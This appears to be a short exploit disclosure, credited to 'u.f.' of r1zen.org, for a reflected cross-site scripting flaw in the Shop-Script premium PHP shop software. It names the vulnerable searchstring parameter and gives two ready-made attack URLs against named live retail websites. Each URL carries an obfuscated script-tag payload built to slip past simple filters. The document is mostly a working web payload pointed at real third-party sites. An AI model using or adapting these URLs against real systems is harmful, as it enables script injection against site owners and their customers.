 

    ###############################################################################
    ###############################################################################       
    ##                                                                           ##
    ##  *****     *    *******   ********  *     *                               ##
    ##  *   *     **        *    *         **    *                               ## 
    ##  *   *    * *       *     *         * *   *    *******   ****     *****   ##
    ##  *****   *  *      *      * ***     *  *  *    *     *  **   *   *    *   ##
    ##  *  *       *     *       *         *   * *    *     *  *        *    *   ##
    ##  *   *      *    *        *         *    **    *     *  *        *    *   ##
    ##  *    *     *   *******   ********  *     * Ž  *******  *         *****   ##   
    ##        *                                                              *   ##                                                  
    ##         *                                                             *   ## 
    ##                                                                   *   *   ##
    ##                                                                   *****   ##
    ###############################################################################
    ###############################################################################

 
                   -SHOP-SCRIPT  XSS Remote Vulnerabilities-
 
 
    [>>] Script :      shop-script (premium)


    [>>] Language :    php


    [>>] Web Site :    http://www.shop-script.com


    [>>] Autor :       u.f.


    [>>] Thanks to :   Jason, bull, T0r3x, Clark, Meth0d and all members r1zen.org


    Exploit Info


    Vuln is : /index.php?


    http://www.localhost.com/index.php?searchstring=[XSS]


    Example : 
 

    http://www.skye-jewellery.co.uk/index.php?searchstring=1>'><ScRiPt%20%0a%0d>alert(400760821437)%3B</ScRiPt>

    http://www.polycoltd.co.uk:80/index.php?searchstring=1>'><ScRiPt%20%0a%0d>alert(400770850275)%3B</ScRiPt>